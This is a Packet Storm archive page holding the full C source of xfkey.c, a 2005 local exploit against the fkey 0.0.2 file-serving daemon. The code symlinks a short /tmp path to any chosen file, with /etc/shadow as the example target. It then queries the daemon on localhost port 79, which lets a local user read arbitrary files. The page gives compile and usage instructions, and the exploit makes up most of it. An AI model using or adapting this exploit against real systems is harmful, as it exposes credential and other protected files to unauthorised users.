what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xfkey.c

xfkey.c
Posted Jan 25, 2005
Authored by vade79 | Site fakehalo.us

fkey version 0.0.2 local file accessibility exploit.

tags | exploit, local
SHA-256 | dfb6bbb2d3c62d255c655605b6d08045515378ba0ce5439df34cced8c6849b4a

xfkey.c

Change Mirror Download


nothing major, just killing some time and strolled across this project on freshmeat.

original version:
http://fakehalo.us/xfkey.c


--------------------- exploit: xfkey.c ----------------------

/*[ fkey[v0.0.2]: local/remote file accessibility exploit. ]*
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* netris homepage/URL: *
* http://www.freshmeat.net/projects/fkey *
* *
* compile: *
* gcc xfkey.c -o xfkey *
* *
* syntax: *
* # ./xfkey /etc/shadow 2>~/save_filename *
* *
* bug: *
* fkey is a finger-like daemon for accessing remote files *
* in a specified directory. there is no limitations *
* placed on the file acessing other than it must be a *
* filename/path equal to 10 or less bytes. this limits *
* the remote possibilities somewhat, but symlinking to a *
* short path(ie. /tmp/file) locally can access anything. *
* (this exploits locally) *
* *
* note: *
* this is pretty low-risk due to the fact that the *
* program isn't very common, just browsing freshmeat.net *
* and killing some time. *
************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TMPFILE "/tmp/xfkey" /* must be 10 characters or less. */

void fkey_connect(unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}

int main(int argc,char **argv){
unsigned short port=79;
if(argc<2){
printf("[!] syntax: %s <file> [port]\n",argv[0]);
exit(1);
}
if(argc>2)port=atoi(argv[2]);
unlink(TMPFILE);
if(symlink(argv[1],TMPFILE))
printe("symlink() failed.",1);
fkey_connect(port);
unlink(TMPFILE);
exit(0);
}
void fkey_connect(unsigned short port){
int sock=0,l=0,m=0;
char buf[1024+1];
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: localhost:%u.\n",port);
if((s.sin_addr.s_addr=inet_addr("127.0.0.1"))){
if(!(t=gethostbyname("localhost")))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(3);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("connection failed.",1);
alarm(0);
printf("[*] successfully connected: localhost:%u.\n",port);
write(sock,TMPFILE,strlen(TMPFILE));
alarm(5);
for(memset(buf,0,1025);(l=read(sock,buf,1024));memset(buf,0,1025)){
fputs(buf,stderr);
m+=l;
}
alarm(0);
if(m<=0)
printe("exploit failed, file doesn't exist or zero-length file.",0);
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close